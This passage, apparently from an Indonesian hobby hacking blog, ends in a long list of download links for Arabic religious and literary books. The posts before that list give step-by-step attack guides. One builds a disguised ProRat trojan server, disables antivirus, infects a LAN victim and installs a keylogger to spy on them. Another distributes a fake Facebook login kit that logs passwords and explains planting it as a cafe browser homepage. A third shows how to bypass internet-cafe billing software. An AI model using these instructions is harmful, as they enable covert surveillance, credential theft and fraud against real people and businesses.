yang terbuka.<br />Yang akan dijadikan korban pada percobaan saya adalah komputer 8 dengan IP 192.168.0.8. (coz, ane tau klo dia punya bnyak chips) hehe..<br /><br />2. Langkah selanjutnya yaitu kita jalankan ProRat, tools ini dapat kamu download di http://www.prorat.net .<br />Sebelumnya matiin dulu Anti Virus kamu (disable), karena ProRat akan terdeteksi sebagai virus.<br />Padahal dia tidak berbahaya bagi komputer kita. Setelah itu isikan IP korban pada form IP dan Portnya (default 5110).<br /><br /><br /><br />Apabila kita klik tombol Connect maka koneksi ke komputer korban belum bisa, karena komputer korban belum kita infeksi.<br />Untuk menginfeksi computer korban kita terlebih dahulu membuat server yang akan dijalankan pada computer korban.<br />Caranya klik tombol Create – Create Prorat Server. Lalu muncul tampilan Notifications :<br /><br /><br /><br />Centang pilihan Use Proconnective Notifications dan isi IP(DNS)Address dengan IP kita.<br />Pada tab General Setting kita isikan Server Port (default 5110), Server Password dan Victim Name.<br /><br /><br /><br />- Pada tab Bind with File kita dapat menyusupkan file yang akan dijalankan bersama Server. Extensi file bebas.<br />- Selanjutnya adalah tab Server Extension, ada beberapa pilihan extensi server. Kita pilih yang berekstensi .Exe.<br />- Untuk membuat icon server kita klik tab Server Icon, pilih icon apa saja yang kamu inginkan.<br /><br /><br /><br />Langkah terakhir dari pembuatan server ini adalah klik Create Server.<br />Setelah berhasil, akan tampil :<br /><br /><br /><br />3. Kita tinggal menjalankan Server tersebut dikomputer korban. Caranya terserah kamu… mau disusupkan diam-diam atau<br />memakai teknik Social Engineering dan juga dapat kamu infeksikan langsung pada computer tersebut.<br /><br />4. Setelah Server tersebut berhasil berjalan pada komputer korban, maka kita langsung mencoba mengkoneksikannya dengan komputer kita.<br /><br />5. Untuk koneksi kita dapat menggunakan ProConnective atau langsung mengetikkan IP address dan Port komputer korban.<br />ProConnective adalah tools bawaan dari ProRat yang berfungsi sebagai Bridge (jembatan koneksi) antara komputer server dan komputer client (korban).<br />Akan nampak IP korban apabila dia sedang on.<br /><br />6. Setelah berhasil melakukan koneksi ke komputer korban maka status dari ProRat akan berubah dari Disconnected ke Connected<br /><br />7. klo udh gtu trserah deh mo km apain, Ada banyak hal yang dapat kita lakukan pada komputer korban seperti mengetahui informasi dari PC,<br />mengirimkan pesan error, mematikan komputer, mengunci mouse, membuka CD-ROM, dan msh bnyak lgi…<br /><br />8. Sekarang kita akan melihat PC info korban :<br /><br /><br /><br />9. Memasang Keylogger.<br /><br /><br /><br />10. Dan kita bisa melihat tuh orng lg buka apa!!!<br /><br /><br /><br /><br />Wuih…lumayan tuh tuh orng punya 16M, hihi!<br /><br />Cara Pencegahan<br />1. Update selalu Anti Virus anda agar mampu mendeteksi adanya infeksi dari<br />ProRat. Biasanya server ProRat terdeteksi sebagai<br />Trojan.Dropper.Prorat.DZ.29, Dropped:Backdoor.Prorat.DZ.<br />2. Pasanglah Anti Prorat, anda bisa mendownloadnya di<br />http://www.softpedia.com/get/Antivir...i-prorat.shtml.salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-66745035347482436172011-06-13T19:12:00.000-07:002011-06-13T19:16:52.353-07:00Membuat Fake Login Facebookuntuk hack pacebook,seringkali menggunakan facebook fake login<br />tapi banyak yang gak tau cara ngebuatnya<br />ne aku share......<br />kamu download dulu file nya <a href="http://www.sendspace.com/folder/8psx85">disini</a><br />nama filenya "facebook fake login.rar"<br /><br />baca aturan pakai:<br /><br />kmu hrus cari hostingn yang support ma php..<br />tinggal upload deh file write.php dan index.php nya..<br /><br />klo berhasil..akan ada file baru ;Password.txt di direktory yang sama<br /><br />selesai dah..untuk penyebaranya silahkan dengan cara masing2...<br /><br />kalau gw sih caranya :<br />masuk ke warnetnya orang... teruz...<br />> untuk pengguna firefox: buka tools>option>main<br />(ubah homepage nya menjadi lokasi tempat lokasi file hosting untuk "fake login" kamu<br />> atau lo cari cara penyebaran web "fake login" lo dengan cara masing2 <br /><br />tapi perlu di ingat,hal ini sampah belaka,saya posting aja karna capek terina sms tanya itu melulu.........salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-79036802387353206342011-06-13T18:56:00.000-07:002011-06-13T18:57:02.551-07:00nyasarudin<iframe width="425" height="349" src="http://www.youtube.com/embed/y2sKvqCxDrg" frameborder="0" allowfullscreen></iframe>salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-2642686580014605962011-06-08T11:30:00.000-07:002011-06-08T11:47:01.164-07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipkghf2Dqj7njce3IegJD7bOfqvjwHptck1JB3wq17AbTP6QTP9iV0O99YtGB8Yh5l7pvI3rJyHkYWVaR8ZWO-rRbhjsGX9Xa0BUG4lthbq7S-BJCZjplNBisdcJUXQzm3MRUBZsqwZ3g/s1600/1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 300px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipkghf2Dqj7njce3IegJD7bOfqvjwHptck1JB3wq17AbTP6QTP9iV0O99YtGB8Yh5l7pvI3rJyHkYWVaR8ZWO-rRbhjsGX9Xa0BUG4lthbq7S-BJCZjplNBisdcJUXQzm3MRUBZsqwZ3g/s400/1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5615919798209094402" /></a><br />dalam kegiatan hacking Billing Explorer Client ini saya menggunakan bantuan dari program bernama <a href="http://www.4shared.com/file/Xyw_iMyz/hackclient.html">hackclient.exe</a> yang saya temukan dari forum HNc. Karena tutorial disana kurang lengkap maka sebagai tanda balas jasa atas ilmu yang telah saya peroleh maka saya membuat tutorial sederhana ini.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaLLnRBlvT_VeJ_qFHqbL9XgzmwKxPiAx-sChYFwGwkzmkHGY7UXFUZ9lREDIrFdOOKvBJUmr0u1TyAmiXKm3xmveLAj8chIp1RE4BXg1bryrXsFZcvtHr5oB8bvR_VdpTL2PwspxDu2w/s1600/2.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 123px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaLLnRBlvT_VeJ_qFHqbL9XgzmwKxPiAx-sChYFwGwkzmkHGY7UXFUZ9lREDIrFdOOKvBJUmr0u1TyAmiXKm3xmveLAj8chIp1RE4BXg1bryrXsFZcvtHr5oB8bvR_VdpTL2PwspxDu2w/s320/2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5615920337267557426" /></a><br />Di warnet masuk sebagai Personal dan siapkan modal program aplikasi <a href="http://www.4shared.com/file/Xyw_iMyz/hackclient.html">hackclient.exe </a><br />Jika sudah didapat lalu jalankan aplikasinya. Maka akan muncul tampilan seperti berikut ini :<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM085ErPJ9mm0sOleFe2fRmh6TSgh7R2mqkA5yHMxIzECUD4eI437vdv2DvdTWnVUd5djeWiS08MLlU5EGKbpLU1npYznRsQ4d83aZ5KA19FQAB1DnWoEfhL10e-tNA8Ln_pER37LFUbM/s1600/3.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 239px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM085ErPJ9mm0sOleFe2fRmh6TSgh7R2mqkA5yHMxIzECUD4eI437vdv2DvdTWnVUd5djeWiS08MLlU5EGKbpLU1npYznRsQ4d83aZ5KA19FQAB1DnWoEfhL10e-tNA8Ln_pER37LFUbM/s320/3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5615920653557370066" /></a><br /><br />Perhatikan disana ada 2 program billing client, gag usah bingung gambar yang tampil di atas adalah billing client yang palsu, sedangkan yang asli ada di bagian paling kiri, yang tampilannya paling sederhana, dan yang pada awal tadi telah Anda lihat.<br /><br />Ikuti petunjuk berurutan sesuai yang ada pada program billing client palsu. Jika beruntung maka Anda bisa keluar dari program billing client dan menikmati hampir semua fasilitas windows yang dikunci oleh billing client aslinya.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUKT4JB9G8zn_2KC0v1aKSfos4YyE8pNGntYFbkGLtvwUAwKlMdfDz-0sH0i5W7lepzLU2LRJRsiA-WmhLjUs8c_zkABaAoJeGQi52PvwBsJGVT4cFqSN0-WEH7yQhV010n39q78V1lg4/s1600/4.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 210px; height: 199px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUKT4JB9G8zn_2KC0v1aKSfos4YyE8pNGntYFbkGLtvwUAwKlMdfDz-0sH0i5W7lepzLU2LRJRsiA-WmhLjUs8c_zkABaAoJeGQi52PvwBsJGVT4cFqSN0-WEH7yQhV010n39q78V1lg4/s320/4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5615920824281016034" /></a><br /><br />Perhatikan bahwa cara ini tidak akan mengurangi nilai nominal yang tertera di billing server (operator) yang harus Anda bayarkan. Ada baiknya tutorial ini digunakan untuk pembelajaran bukan untuk perbuatan jahat. Kasihan operator dan pemilik warnetnya, untuk mendapat 2000 perak pun terhalang dengan ulah pemakai aplikasi ini.<br />Silakan download toolsnya <a href="http://www.4shared.com/file/Xyw_iMyz/hackclient.html">disini</a>salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-82319734813265065772011-06-08T11:09:00.000-07:002011-06-08T11:10:16.980-07:00kumpulan kitab2 langkahttp://www.4shared.com/dir/TKi-ZYQS/___.html#salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-16373645489512743422011-06-08T11:05:00.000-07:002011-06-08T11:07:25.775-07:00kitabtambahan koleksi kitab buat kawan2 santri<br /> http://www.megaupload.com/?d=4SW7HRIM<br /><br /> السنة ومكانتها في التشريع<br /> http://www.megaupload.com/?d=DOYGGNQA<br /><br /> <br /><br /> العقد المنظوم في الخصوص والعموم<br /> http://www.megaupload.com/?d=T5RHHNKX<br /><br /> <br /><br /> الفتح المبين في حل رموز ومصطلحات الفقهاء والأصوليين<br /> http://www.megaupload.com/?d=JD3GQXYF<br /><br /> <br /><br /> القواعد الفقهية الكبرى وما تفرع عنها<br /> http://www.megaupload.com/?d=EWEZPGJQ<br /><br /> <br /><br /> ضوابط المعرفة و أصول الاستدلال و المناظرة<br /> http://www.megaupload.com/?d=2M476C0K<br /><br /> <br /><br /> القواعد الفقهية المستخرجة من كتاب إعلام الموقعين<br /> http://www.megaupload.com/?d=I4KZHS4G<br /><br /> <br /><br /> القواعد الفقهية بين الأصالة والتوجيه<br /> http://www.megaupload.com/?d=61Z85N9V<br /><br /> <br /><br /> القواعد الفقهية لابن عثيمين<br /> http://www.megaupload.com/?d=ZQRKH1D9<br /><br /> <br /><br /> القواعد الفقهية مع الشرح الموجز<br /> http://www.megaupload.com/?d=WY0Z3N0X<br /><br /> <br /><br /> القواعد والأصول الجامعة<br /> http://www.megaupload.com/?d=L0XMCL7U<br /><br /> <br /><br /> المحصول في علم أصول الفقه<br /> http://www.megaupload.com/?d=3K7H7GPI<br /><br /> <br /><br /> المدخل المفصل في فقه الإمام ابن حنبل<br /> http://www.megaupload.com/?d=R6S0RQF1<br /><br /> <br /><br /> رفع الملام عن الأئمة الأعلام<br /> http://www.megaupload.com/?d=9JMPLHM0<br /><br /> <br /><br /> شرح القواعد الفقهية – الزرقا<br /> http://www.megaupload.com/?d=64Y34X2K<br /><br /> <br /><br /> منتهى السول في علم الأصول ويليه تحصيل المأمول مختصر إرشاد الفحول<br /> http://www.megaupload.com/?d=MX1J134K<br /><br /> <br /><br /> المستصفى من علم الأصول<br /> http://www.megaupload.com/?d=YH7ST5XO<br /><br /> <br /><br /> غمز عيون البصائر شرح كتاب الأشباه والنظائر – لابن نجيم<br /> http://www.megaupload.com/?d=8RP57RIW<br /><br /> <br /><br /> المغني في أصول الفقه<br /> http://www.megaupload.com/?d=20W6RD14<br /><br /> <br /><br /> المفاضلة في العبادات قواعد وتطبيقات<br /> http://www.megaupload.com/?d=D49GEEPS<br /><br /> <br /><br /> الواضح في أصول الفقه لعلي بن عقيل<br /> http://www.megaupload.com/?d=VTMN7JDP<br /><br /> <br /><br /> التنوير في الاصطلاحات الطبية<br /> http://www.megaupload.com/?d=KGJJ526M<br /><br /> <br /><br /> الوجيز في أصول الفقه لوهبة الزحيلي<br /> http://www.megaupload.com/?d=D4269QHX<br /><br /> <br /><br /> المقامات الحريري<br /> http://www.megaupload.com/?d=3B82MX1H<br /><br /> <br /><br /> تيسير الوصول إلى منهاج الأصول من المنقول والمعقول – المختصر<br /> http://www.megaupload.com/?d=JKK27HM4<br /><br /> <br /><br /> حجية السنة<br /> http://www.megaupload.com/?d=GXR5I7KB<br /><br /> <br /><br /> خلاصة تاريخ التشريع الإسلامي<br /> http://www.megaupload.com/?d=BJUOLEWR<br /><br /> <br /><br /> شرح البدخشي – منهاج العقول – شرح الأسنوي – نهاية السول<br /> http://www.megaupload.com/?d=7H5UR9SY<br /><br /> <br /><br /> شرح الورقات لإمام الحرمين الجويني<br /> http://www.megaupload.com/?d=DW1PM8C8<br /><br /> <br /><br /> ضوابط الفتوى<br /> http://www.megaupload.com/?d=N3SY2RNS<br /><br /> <br /><br /> طريق الوصول إلى العلم المأمول<br /> http://www.megaupload.com/?d=W9HGA9CQ<br /><br /> <br /><br /> قواطع الأدلة في أصول الفقه<br /> http://www.megaupload.com/?d=QBJ9PYYK<br /><br /> <br /><br /> متن الورقات – نظم الورقات<br /> http://www.megaupload.com/?d=AZLZYUPX<br /><br /> <br /><br /> مذكرة في أصول الفقه<br /> http://www.megaupload.com/?d=CWO3CEIC<br /><br /> <br /><br /> معجم أصول الفقه<br /> http://www.megaupload.com/?d=D4R8179A<br /><br /> <br /><br /> مقاصد الشريعة عند ابن تيمية<br /> http://www.megaupload.com/?d=L9O68J5L<br /><br /> <br /><br /> مناظرات في أصول الشريعة الإسلامية بين ابن حزم و الباجي<br /> http://www.megaupload.com/?d=RZF04PFP<br /><br /> <br /><br /> نفائس الأصول في شرح المحصول<br /> http://www.megaupload.com/?d=LO3MNS0U<br /><br /> <br /><br /> ابداع الأساليب في انشاء الرسائل والمكاتيب<br /> http://www.megaupload.com/?d=QAGW8EKL<br /><br /> <br /><br /> أحسن التقاسيم<br /> http://www.megaupload.com/?d=98E0U9P4<br /><br /> <br /><br /> أحوال مالطا وفنون أوروبا<br /> http://www.megaupload.com/?d=VJ5MBGBM<br /><br /> <br /><br /> أرجوزة ابن المعتز<br /> http://www.megaupload.com/?d=Q1FRFGR1<br /><br /> <br /><br /> أساس البلاغة<br /> http://www.megaupload.com/?d=ER3YIMCO<br /><br /> <br /><br /> أسرار العربية<br /> http://www.megaupload.com/?d=WULN2CMC<br /><br /> <br /><br /> اعراب ألفية ابن مالك<br /> http://www.megaupload.com/?d=UM2L27G4<br /><br /> <br /><br /> الاكتشافات الجغرافية<br /> http://www.megaupload.com/?d=D6E94ZKD<br /><br /> <br /><br /> الانتقاد على كتاب التمدن الاسلامي<br /> http://www.megaupload.com/?d=8N1KS3N1<br /><br /> <br /><br /> الانقلاب العثماني الكبير<br /> http://www.megaupload.com/?d=T78W6UNC<br /><br /> <br /><br /> الترياق الفاروقي<br /> http://www.megaupload.com/?d=EHXDN5UJ<br /><br /> <br /><br /> التنبيه والاشراف للمسعودي<br /> http://www.megaupload.com/?d=XTK3IR0W<br /><br /> <br /><br /> الخطابة والخطيب<br /> http://www.megaupload.com/?d=IWWS1M74<br /><br /> <br /><br /> الخيرات الحسان في مناقب أبي حنيفة النعمان<br /> http://www.megaupload.com/?d=YP0KMHPP<br /><br /> <br /><br /> أساس الاقتباس<br /> http://www.megaupload.com/?d=DL92RQ8E<br /><br /> <br /><br /> الدرس التام في التاريخ العام<br /> http://www.megaupload.com/?d=PQH6XAFH<br /><br /> <br /><br /> الرحلة الحجازية<br /> http://www.megaupload.com/?d=4UAY8UFS<br /><br /> <br /><br /> الرحلة اليابانية<br /> http://www.megaupload.com/?d=HTMO89JD<br /><br /> <br /><br /> الرحمة الغيثية<br /><br /> 2 MB<br /><br /> http://www.megaupload.com/?d=3ZIUX7UK<br /><br /> السيرة البهية في تاريخ الجاهلية<br /> http://www.megaupload.com/?d=B7PT2MEC<br /><br /> <br /><br /> الشهاب في الشيب والشباب<br /> http://www.megaupload.com/?d=28VVXHGW<br /><br /> <br /><br /> الصادح والباغم<br /> http://www.megaupload.com/?d=LLU92U56<br /><br /> <br /><br /> الصحائف السود<br /> http://www.megaupload.com/?d=YKBB0KAL<br /><br /> <br /><br /> الطغرائي<br /> http://www.megaupload.com/?d=CJ12NAPF<br /><br /> <br /><br /> الكتب العربية بالخزانة الخديوية<br /> http://www.megaupload.com/?d=Y1KQNLSK<br /><br /> <br /><br /> اللطائف والظرائف<br /> http://www.megaupload.com/?d=HD8U1ZTK<br /><br /> <br /><br /> المعمرين من العرب<br /> http://www.megaupload.com/?d=HHOVWSQN<br /><br /> <br /><br /> المفصل في النحو<br /> http://www.megaupload.com/?d=D958AG3K<br /><br /> <br /><br /> النخبة الأزهرية<br /> http://www.megaupload.com/?d=JIWVHJ4S<br /><br /> <br /><br /> أمراء البلد الحرام<br /> http://www.megaupload.com/?d=KWKE9X4W<br /><br /> <br /><br /> المسالك والممالك<br /> http://www.megaupload.com/?d=5PE9XGSK<br /><br /> <br /><br /> الوسيط<br /> http://www.megaupload.com/?d=3XJSFVOY<br /><br /> <br /><br /> تاريخ الخلفاء<br /> http://www.megaupload.com/?d=U84TV8RZ<br /><br /> <br /><br /> تاريخ الدولة الرسولية<br /> http://www.megaupload.com/?d=AY2VX8H7<br /><br /> <br /><br /> تاريخ الفلاسفة<br /> http://www.megaupload.com/?d=WNKEPFUB<br /><br /> <br /><br /> تاريخ صيدا<br /> http://www.megaupload.com/?d=TDCIA6WZ<br /><br /> <br /><br /> تاريخ مصر إلى الفتح العثماني<br /> http://www.megaupload.com/?d=WP2KMSMN<br /><br /> <br /><br /> تأويل مختلف الحديث<br /> http://www.megaupload.com/?d=681JWKAP<br /><br /> <br /><br /> ترجمان المكاتبة<br /> http://www.megaupload.com/?d=0SGQNIFK<br /><br /> <br /><br /> تقريظات على المطالع النصرية<br /> http://www.megaupload.com/?d=XL5SS1RN<br /><br /> <br /><br /> خاص الخاص<br /> http://www.megaupload.com/?d=7P4YDZL1<br /><br /> <br /><br /> خريدة العجائب<br /> http://www.megaupload.com/?d=5YM8BJXE<br /><br /> <br /><br /> ديوان ابن المعتر<br /> http://www.megaupload.com/?d=UXGYHMOF<br /><br /> <br /><br /> ديوان ابن هاني<br /> http://www.megaupload.com/?d=L85XXKCW<br /><br /> <br /><br /> ديوان أبي فراس<br /> http://www.megaupload.com/?d=XHK60Q8A<br /><br /> <br /><br /> ديوان أبي فراس الحمداني<br /> http://www.megaupload.com/?d=ITNNT94I<br /><br /> <br /><br /> ديوان أشعار الحماسة<br /> http://www.megaupload.com/?d=N2X09Q83<br /><br /> <br /><br /> ديوان الأبيوردي<br /> http://www.megaupload.com/?d=32EJNE95<br /><br /> <br /><br /> ديوان البحتري<br /> http://www.megaupload.com/?d=6ZJT79EM<br /><br /> <br /><br /> ديوان الحماسة<br /> http://www.megaupload.com/?d=4B9Y7UDV<br /><br /> <br /><br /> نور اليقين في سيرة خير المرسلين<br /> http://www.megaupload.com/?d=8IM4C41Z<br /><br /> <br /><br /> فهرس مخطوطات الظاهرية<br /> http://www.megaupload.com/?d=3S303WB7<br /><br /> <br /><br /> ديوان الزير سالم<br /> http://www.megaupload.com/?d=LWM3TNUS<br /><br /> <br /><br /> ديوان الشماخ<br /> http://www.megaupload.com/?d=HQM98TG5<br /><br /> <br /><br /> ديوان الوزير بهاء الدين<br /> http://www.megaupload.com/?d=U0N4XC2I<br /><br /> <br /><br /> قراء النقاية<br /> http://www.megaupload.com/?d=BEDWWWWT<br /><br /> <br /><br /> العنوان في القراءات السبع<br /> http://www.megaupload.com/?d=WL31QW3Q<br /><br /> <br /><br /> القراءات السبع و الاستشهاد بها<br /> http://www.megaupload.com/?d=Z2NS66PO<br /><br /> <br /><br /> القراءات العشر المختلفة في العلامة الاعرابية واثر ذلك في المعنى<br /> http://www.megaupload.com/?d=SDOYCKO0<br /><br /> <br /><br /> القراءات واللغويات في معاني القران<br /> http://www.megaupload.com/?d=J7QH66EQ<br /><br /> <br /><br /> أبجد العلوم<br /> http://www.megaupload.com/?d=VGARJU5H<br /><br /> <br /><br /> أطواق الذهب<br /> http://www.megaupload.com/?d=G9YM2TNQ<br /><br /> <br /><br /> التكملة لكتاب الصلة<br /> http://www.megaupload.com/?d=QD7LRV07<br /><br /> <br /><br /> التبيان لبعض المباحث المعلقة بالقرآن<br /> http://www.megaupload.com/?d=E22FAS83<br /><br /> <br /><br /> غريب الحديث للهروي<br /> http://www.megaupload.com/?d=F7BVTOUT<br /><br /> <br /><br /> الحواشي الأزهرية على المقدمة الجزرية<br /> http://www.megaupload.com/?d=W0XSHGIK<br /><br /> <br /><br /> الرسائل في العصر العباسي الأول<br /> http://www.megaupload.com/?d=8YW5TANW<br /><br /> <br /><br /> الروضتين في أخبار الدولتين<br /> http://www.megaupload.com/?d=ANGLTI60<br /><br /> <br /><br /> السبل الجلية في الآباء العلية<br /> http://www.megaupload.com/?d=ZNY4PH73<br /><br /> <br /><br /> العقد الثمين في فضائل البلد الأمين<br /> http://www.megaupload.com/?d=LU7A0VW7<br /><br /> <br /><br /> الكشكول لخاتمة الأدباء وكعبة الظرفاء<br /> http://www.megaupload.com/?d=UER20YMN<br /><br /> <br /><br /> الكنز المدفون والفلك المشحون<br /> http://www.megaupload.com/?d=FZXCH10Z<br /><br /> <br /><br /> المباديء النصرية لمشاهير العلوم الأزهرية<br /> http://www.megaupload.com/?d=3NXB58PD<br /><br /> <br /><br /> المحاسن والمساوي<br /> http://www.megaupload.com/?d=1RXC2MP8<br /><br /> <br /><br /> المحاضرات الأثرية<br /> http://www.megaupload.com/?d=75H8GLK6<br /><br /> <br /><br /> المنتقى شرح الموطا<br /> http://www.megaupload.com/?d=70K5W4WM<br /><br /> <br /><br /> المنحة الأزهرية في تخطيط مدينة الأسكندرية<br /> http://www.megaupload.com/?d=YULD01XU<br /><br /> <br /><br /> الوسيط في الأدب العربي وتاريخه<br /> http://www.megaupload.com/?d=5062D4QV<br /><br /> <br /><br /> بديع الإنشاء والصفات في المكاتبات والمراسلات<br /> http://www.megaupload.com/?d=6L4V04XT<br /><br /> <br /><br /> تاريخ الحضارة<br /> http://www.megaupload.com/?d=1RPHVFLJ<br /><br /> <br /><br /> تاريخ الرومانيين<br /> http://www.megaupload.com/?d=R418UTZL<br /><br /> <br /><br /> تاريخ الدولة المكدونية<br /> http://www.megaupload.com/?d=2VD59L6Q<br /><br /> <br /><br /> تاريخ المسجد النبوي<br /> http://www.megaupload.com/?d=7DM2ICVR<br /><br /> <br /><br /> تذكرة الحفاظ<br /> http://www.megaupload.com/?d=BRQJH82B<br /><br /> <br /><br /> حاشية أبي النجا على متن الأجرومية<br /> http://www.megaupload.com/?d=6T6S2FPA<br /><br /> <br /><br /> حصول المأمول علم الأصول<br /> http://www.megaupload.com/?d=29A1KVO5<br /><br /> <br /><br /> دروس البلاغة<br /> http://www.megaupload.com/?d=V7RD0ARJ<br /><br /> <br /><br /> ديوان أبي النواس<br /> http://www.megaupload.com/?d=JJ5O9KKW<br /><br /> <br /><br /> منجم العمران في المستدرك على معجم البلدان<br /> http://www.megaupload.com/?d=WEYD7ENO<br /><br /> <br /><br /> مهمات المتون<br /> http://www.megaupload.com/?d=IVN5KQPZ<br /><br /> <br /><br /> فهرس المخطوطات الفارسية بدار الكتب حتى عام 1963<br /> http://www.megaupload.com/?d=7XX0YLHX<br /><br /> <br /><br /> علم المقاصد الشرعية<br /> http://www.megaupload.com/?d=BYAGC6MV<br /><br /> <br /><br /> صلاح الأمة في علو الهمة<br /> http://www.megaupload.com/?d=2G3QBYP7<br /><br /> <br /><br /> ديوان سبط ابن التعاويذي<br /> http://www.megaupload.com/?d=OMK964QO<br /><br /> <br /><br /> ديوان طرفة وزهير وامرئ القيس<br /> http://www.megaupload.com/?d=WFYZ7JU0<br /><br /> <br /><br /> ذكر المعتزلة من كتاب المية والأمل<br /> http://www.megaupload.com/?d=1TTLLOV2<br /><br /> <br /><br /> رحلة ابن بطوطة<br /> http://www.megaupload.com/?d=9A0HZBFO<br /><br /> <br /><br /> رسائل أبي الفضل الهمذاني<br /> http://www.megaupload.com/?d=29HM71WY<br /><br /> <br /><br /> رسائل أبي منصور الثعالبي<br /> http://www.megaupload.com/?d=V8PR6NC8<br /><br /> <br /><br /> سر تقدم الأنكليز<br /> http://www.megaupload.com/?d=P0DKHNSP<br /><br /> <br /><br /> سفن الاسطول الاسلامي<br /> http://www.megaupload.com/?d=ZDOPC6DE<br /><br /> <br /><br /> سمير الليالي<br /> http://www.megaupload.com/?d=OJS05AL5<br /><br /> <br /><br /> شرح غرر الأحكام<br /> http://www.megaupload.com/?d=NHXF4YJO<br /><br /> <br /><br /> شرح لامية المعجم<br /> http://www.megaupload.com/?d=OM1NL306<br /><br /> <br /><br /> شرح محمد عليش<br /> http://www.megaupload.com/?d=UP3PBDHC<br /><br /> <br /><br /> صناعة الناثر والناظم<br /> http://www.megaupload.com/?d=K3XMN2BR<br /><br /> <br /><br /> طبقات الأمم<br /> http://www.megaupload.com/?d=D2G4O6S5<br /><br /> <br /><br /> طبقات المدلسين طبعة الخانجي<br /> http://www.megaupload.com/?d=PQ8Q7PDK<br /><br /> <br /><br /> طبقات ربات الخدور<br /> http://www.megaupload.com/?d=VKIGAUN2<br /><br /> <br /><br /> طرف عربية<br /> http://www.megaupload.com/?d=OOQNVRQ9<br /><br /> <br /><br /> علم الدين<br /> http://www.megaupload.com/?d=WQNCDKJW<br /><br /> <br /><br /> تفسير ابن عباس ومروياته في التفسير من كتب السنه<br /> http://www.megaupload.com/?d=2EYMOXA1<br /><br /> <br /><br /> نخبة الدهر في عجائب البر والبحر<br /> http://www.megaupload.com/?d=RP5P83UZ<br /><br /> <br /><br /> جامع البيان في القراءات السبع<br /> http://www.megaupload.com/?d=NR5AHXDV<br /><br /> <br /><br /> غرائب البر والبحر<br /> http://www.megaupload.com/?d=86G8THF1<br /><br /> <br /><br /> فرائد اللآل في مجمع الأمثال<br /> http://www.megaupload.com/?d=4PO64F8N<br /><br /> <br /><br /> قاموس الجغرافية القديمة<br /> http://www.megaupload.com/?d=DYHIIC0U<br /><br /> <br /><br /> كفاية المتحفظ ونهاية المتلفظ<br /> http://www.megaupload.com/?d=5DOQK5HB<br /><br /> <br /><br /> كنز الرغائب في منتخبات الجوائب<br /> http://www.megaupload.com/?d=DWTP9I6K<br /><br /> <br /><br /> لقطة العجلان<br /> http://www.megaupload.com/?d=664VIREP<br /><br /> <br /><br /> مآثر عبد القادر وفضائل الجزائر<br /> http://www.megaupload.com/?d=XTSP9CTE<br /><br /> <br /><br /> مجمع البحرين لناصيف اللبناني<br /> http://www.megaupload.com/?d=6UXQVZOF<br /><br /> <br /><br /> مجموع ابن أبي بكر المقري<br /> http://www.megaupload.com/?d=OO5D4AJZ<br /><br /> <br /><br /> مسامرة الضيف بمفاخرة الشتا والصيف<br /> http://www.megaupload.com/?d=BISVPYBN<br /><br /> <br /><br /> مصارع العشاق<br /> http://www.megaupload.com/?d=GVPD9BMB<br /><br /> <br /><br /> مصر والجغرافيا<br /> http://www.megaupload.com/?d=FSZIQQCM<br /><br /> <br /><br /> مطول على التلخيص<br /> http://www.megaupload.com/?d=HPWSXYY1<br /><br /> <br /><br /> مقدمة ابن خلدون<br /> http://www.megaupload.com/?d=DQ1GK21T<br /><br /> <br /><br /> من غاب عنه المطرب<br /> http://www.megaupload.com/?d=JQ4HLPW7<br /><br /> <br /><br /> مناقب أبي حنيفة<br /> http://www.megaupload.com/?d=OVXTLULI<br /><br /> <br /><br /> نشوة السكران<br /> http://www.megaupload.com/?d=NUBDFOD0<br /><br /> <br /><br /> نهاية الإرب شرح معلقات العرب<br /> http://www.megaupload.com/?d=7X685SIO<br /><br /> <br /> ابراهيم النخعي وآثاره الواردة في تفسير الفاتحة والبقرة وال عمران<br /><br /> <br /> http://www.megaupload.com/?d=FM78N84T<br /><br /> <br /><br /> ابن جريح مروياته واقواله في التفسير دراسة<br /> http://www.megaupload.com/?d=TR1NUZ8V<br /><br /> <br /><br /> ابوبكر النقاش ومنهجه في تفسير القرآن الكريم<br /> http://www.megaupload.com/?d=GN6CKU1R<br /><br /> <br /><br /> ابي بن كعب وتفسيره للقرآن الكريم<br /> http://www.megaupload.com/?d=V71XZUPV<br /><br /> <br /><br /> اتجاهات التفسير في القرن الرابع عشر الهجري<br /> http://www.megaupload.com/?d=GCN9PJB0<br /><br /> <br /><br /> اثر الدلالات اللغوية في التفسير عند ابن عاشور<br /> http://www.megaupload.com/?d=B58SH5LR<br /><br /> <br /><br /> اختلاف البنية الصرفية في القراءات السبع من طريق الشاطبية<br /> http://www.megaupload.com/?d=WIKKYDCC<br /><br /> 